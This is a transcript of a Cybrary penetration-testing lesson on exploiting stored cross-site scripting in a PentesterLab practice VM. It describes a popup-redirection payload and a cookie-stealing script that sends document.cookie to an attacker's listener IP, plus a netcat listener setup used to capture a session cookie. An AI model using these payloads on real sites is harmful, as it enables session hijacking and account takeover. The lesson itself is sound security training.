Part 9 - Exploiting XSS

Video Activity

This video covers exploiting cross-site scripting: how to exploit XSS manually via redirection and cookie theft, and how to exploit XSS with BeEF.


Time: 4 hours 20 minutes
Difficulty: Intermediate
CEU/CPE: 5

Video Transcription
>> Welcome to Cybrary. I'm Raymond Evans, and I will be your subject matter expert for Cybrary with that pen-testing course. In this video, we will be discussing exploiting cross-site scripting.

What will be covered? We're going to talk about how to exploit cross-site scripting manually, using redirection and cookie theft, and then how to exploit cross-site scripting with BeEF.

How did we exploit cross-site scripting manually? The same technique that's used to identify cross-site scripting could also be used to exploit it, except some additional steps need to be taken. First, we have to decide what attack we want to perform. Do we want to redirect the user to a malicious site, or do we want to steal data from them?

Next, we are going to cover cross-site scripting redirection. First, we're going to cover cross-site scripting redirection, but first, you're going to need an additional VM. You're going to need the cross-scripting VM from PentesterLab. Go to PENTESTERLAB.COM/EXERCISES/XSS_AND_MYSQL_FILE. That is the VM that we will be using for this one.

How do we exploit cross-site scripting manually to attempt redirection? Well, below is a line of code that can be used to cause an unwanted popup on a vulnerable pull website. Here in this code, we see it's called an image source, example.com onerror, window.open, google.com, XSS, height, width, so that onerror=window.open. That URL that you put in there is going to be the URL that it's trying to call. It's going to have a height and width of 500 by 500. Let's go check that out.

>> Here we are in our environment. We want to get somebody who's viewing this blog to get redirected, or at least have a popup come up. What we're going to do is we're going to come in here, and we're going to leave a comment. Let's call that title test, and we're going to leave it by a non. [NOISE] Here in the text field, we're going to put our script in here and see if it works.

Now, look at that. Iceweasel prevented a site from opening a pop-up window, and this is why it's good to have pop-up blockers turned on, but for the purposes of this class, we're going to allow the pop-up blockers right now so you can check it out. We're going to refresh the page here because the attack is already on the page; it's stored on there right now. We're going to refresh and look at that. We have a pop-up. Now, if this is connected to the Internet, it would have connected to google.com. However, it was not, so it did not connect.

Now, the reason why this worked like it did was because it's trying to pull an image source from this website, but it gives an error trying to pull it from that website. Then on that error, it opens up a window and tries to go to google.com.

Now, you can redirect somebody, but we showed you before that your cookie won't always show up in that alert box; we showed you that in the last video. If you are to try to pull the cookie and the pop-up in this environment, I will do the same exact thing. You're not going to get that document to populate in that pop-up. However, you can't separate listener to try to get that cookie roll back to you.

Let's break this line down a bit here that we got. We have script, new image.source, and so it calls out to the listener's IP and port. When it calls out to it, it's going to send the document.cookie to that port. The script is enclose the state and encloses this content as a script. A new image source. It identifies a server to communicate with; it's saying, hey, we're going to pull a new image from this source, and then LISTENER IP: AND PORT/B.PHP"+DOCUMENT.COOKIE. This portion identifies the server the script will communicate with and will send the cookies to that communicator.

Here's an example how this has been used on a known vulnerable field. We will have script, new image source, HTTP, the IP address of the attacker, port, whatever the port is that the attackers will sign online/B.PHP.

How did we get the data back from this attack? Well, in order to do that, we're going to have to set up a listener. We need a listener. In your terminal type netcat -lvp 80. -l tells Netcat to listen. -v tells Netcat to verbosely print out information received. -p designates the port to use. Let's go set that up real quick.

[NOISE] Here we are in our environment. I'm going to type netcat -lvp 80. Now Netcat is listening on port 80. Next, we're going to put our script that we want to use onto the vulnerable web page. Here we are on our vulnerable section of the page, and we have script, new image source, and we have our IP address here and port 80. We have our Netcat listener already set up. Let's submit the query and see what happens. Well, we are popup because that's stored from last time.

>> Let's just close out there. I see a pen test, so I'll just still work in here. Let's come over here to our listener, and look at that. We got some information back. Pen test labs is connected to us. Say get request, the host. We see the user agents, so we see what they're coming from. Accept, accept, accept. We're still missing some information here. I thought it like continue working here and see if it sends us that nice cookie back. [NOISE] Let's try refreshing the page here. [NOISE] Re-initiate our listener and there we go. Now we refresh the page. We got the cookie from the active user.

Now this cookie here can be used to imitate the individual on the web page. If that person was to be logged in at the time as the admin or as somebody else, this cookie here can be used to imitate them, which is very dangerous. There's something that had sensitive data on it. If there's a website that has sensitive data on it, and it was vulnerable to cross-site scripting, an attack like this could be used to steal a cookie that can imitate an individual to get access into the website.